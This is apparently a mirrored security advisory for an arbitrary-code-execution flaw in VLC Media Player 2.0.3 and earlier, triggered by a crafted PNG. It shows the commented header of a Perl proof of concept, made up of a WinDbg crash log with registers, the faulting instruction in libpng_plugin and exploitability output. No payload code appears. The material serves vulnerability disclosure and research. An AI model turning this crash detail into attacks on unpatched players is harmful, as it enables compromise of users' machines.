Release date: 2012-10-10
Updated: 2012-10-112
Affected systems:
VideoLAN VLC Media Player < 2.0.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55850
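VLC Media Player (originally named VideoLAN Client) is the multimedia player of the VideoLAN project.
VLC Media Player 2.0.3 and earlier contain a security vulnerability; successful exploitation could allow an attacker to execute arbitrary code in the affected application.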
<*Source: Jean Pascal Pereira
*>
Test method:
--------------------------------------------------------------------------------
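Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!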
#!/usr/bin/perl
# VLC Player 2.0.3 <= ReadAV Arbitrary Code Execution
# Author: Jean Pascal Pereira <pereira@secbiz.de>
# Vendor URI:
# Vendor Description:
# VLC is a free and open source cross-platform multimedia player
# and framework that plays most multimedia files as well as DVD,
# Audio CD, VCD, and various streaming protocols.
# Debug Info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe" C:\research\VLC\crafted.png
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path. *
# * Use .symfix to have the debugger choose a symbol path. *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 00420000 image00400000
# ModLoad: 7c900000 7c9b2000 ntdll.dll
# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
# ModLoad: 6a300000 6a322000 C:\Program Files\VideoLAN\VLC\libvlc.dll
# ModLoad: 6a540000 6a775000 C:\Program Files\VideoLAN\VLC\libvlccore.dll
# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.DLL
# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL
# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.DLL
# ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.DLL
# ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL
# ModLoad: 3d930000 3da16000 C:\WINDOWS\system32\WININET.DLL
# ModLoad: 003f0000 003f9000 C:\WINDOWS\system32\Normaliz.dll
# ModLoad: 78130000 78263000 C:\WINDOWS\system32\urlmon.dll
# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
# ModLoad: 3dfd0000 3e1bb000 C:\WINDOWS\system32\iertutil.dll
# (950.5c0): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 64fc0000 64ffb000 C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
# ModLoad: 6b240000 6b253000 C:\Program Files\VideoLAN\VLC\plugins\audio_output\libaout_directx_plugin.dll
# ModLoad: 6e980000 6e992000 C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
# ModLoad: 6d680000 6d698000 C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectx_plugin.dll
# ModLoad: 63880000 63890000 C:\Program Files\VideoLAN\VLC\plugins\mmxext\libmemcpymmxext_plugin.dll
# ModLoad: 6c400000 6c443000 C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
# ModLoad: 68740000 6875d000 C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
# ModLoad: 6f440000 6f485000 C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
# ModLoad: 6b840000 6b852000 C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
# ModLoad: 6f100000 6f111000 C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
# ModLoad: 63a80000 63af3000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_httplive_plugin.dll
# ModLoad: 00f00000 00fb7000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_dash_plugin.dll
# ModLoad: 69e40000 69e50000 C:\Program Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
# ModLoad: 6ae40000 6ae5b000 C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
# ModLoad: 64ac0000 64acf000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libstream_filter_record_plugin.dll
# ModLoad: 70240000 70260000 C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
# ModLoad: 6cd00000 6ce48000 C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
# ModLoad: 66040000 66092000 C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
# ModLoad: 625c0000 626f4000 C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
# ModLoad: 6ff40000 6ff52000 C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
# ModLoad: 6e180000 6e190000 C:\Program Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
# ModLoad: 6d6c0000 6d6f6000 C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
# ModLoad: 6e040000 6e05c000 C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
# ModLoad: 68440000 68458000 C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
# ModLoad: 6c380000 6c391000 C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
# ModLoad: 6ef40000 6ef51000 C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
# ModLoad: 69840000 6985d000 C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
# ModLoad: 62380000 62391000 C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
# ModLoad: 6c2c0000 6c2d0000 C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
# ModLoad: 67e00000 67e10000 C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
# ModLoad: 021f0000 022e3000 C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
# ModLoad: 6bf40000 6bf5b000 C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
# ModLoad: 6a840000 6a976000 C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
# ModLoad: 6d8c0000 6d978000 C:\Program Files\VideoLAN\VLC\plugins\demux\liblive555_plugin.dll
# ModLoad: 6f8c0000 6f8df000 C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
# ModLoad: 70b00000 70b0f000 C:\Program Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
# ModLoad: 64740000 64750000 C:\Program Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
# ModLoad: 65280000 65290000 C:\Program Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
# ModLoad: 6cbc0000 6cbd0000 C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
# ModLoad: 6a9c0000 6a9e6000 C:\Program Files\VideoLAN\VLC\plugins\demux\libts_plugin.dll
# ModLoad: 68940000 68950000 C:\Program Files\VideoLAN\VLC\plugins\demux\libnsv_plugin.dll
# ModLoad: 6fec0000 6fecf000 C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
# ModLoad: 6b500000 6b56a000 C:\Program Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
# ModLoad: 6ce80000 6ce90000 C:\Program Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
# ModLoad: 65300000 6530f000 C:\Program Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
# ModLoad: 653c0000 654c0000 C:\Program Files\VideoLAN\VLC\plugins\demux\libmod_plugin.dll
# ModLoad: 67500000 67510000 C:\Program Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
# ModLoad: 6c940000 6c952000 C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
# ModLoad: 683c0000 683f3000 C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
# (950.ee4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e0f848 ebx=1b000019 ecx=06bfde49 edx=00000001 esi=00e17fff edi=10018714
# eip=683c1b70 esp=013df768 ebp=013df7c0 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -
# libpng_plugin!vlc_entry_license__1_2_0l+0x770:
# 683c1b70 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:003> g;r;!exploitable -v;q
# (950.ee4): Access violation - code c0000005 (!!! second chance !!!)
# eax=00e0f848 ebx=1b000019 ecx=06bfde49 edx=00000001 esi=00e17fff edi=10018714
# eip=683c1b70 esp=013df768 ebp=013df7c0 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
# libpng_plugin!vlc_entry_license__1_2_0l+0x770:
# 683c1b70 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\libvlccore.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
# Exception Faulting Address: 0xe18000
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation
# Faulting Instruction:683c1b70 rep movs dword ptr es:[edi],dword ptr [esi]
# Exception Hash (Major/Minor): 0x7c452c55.0x1c172051